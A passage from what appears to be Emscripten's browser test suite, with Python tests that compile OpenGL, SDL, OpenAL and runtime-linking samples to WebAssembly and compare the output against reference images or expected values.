assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook', 'Common'),
test_file('glbook', 'Common', 'esUtil.c'),
test_file('glbook', 'Common', 'esShader.c'),
test_file('glbook', 'Common', 'esShapes.c'),
test_file('glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_third]', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_set]', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_set]', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp', 0)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.run_process([EMCC, 'supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', 'supp.wasm', '-s', 'EXPORT_ALL'], assert_returncode=76)
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
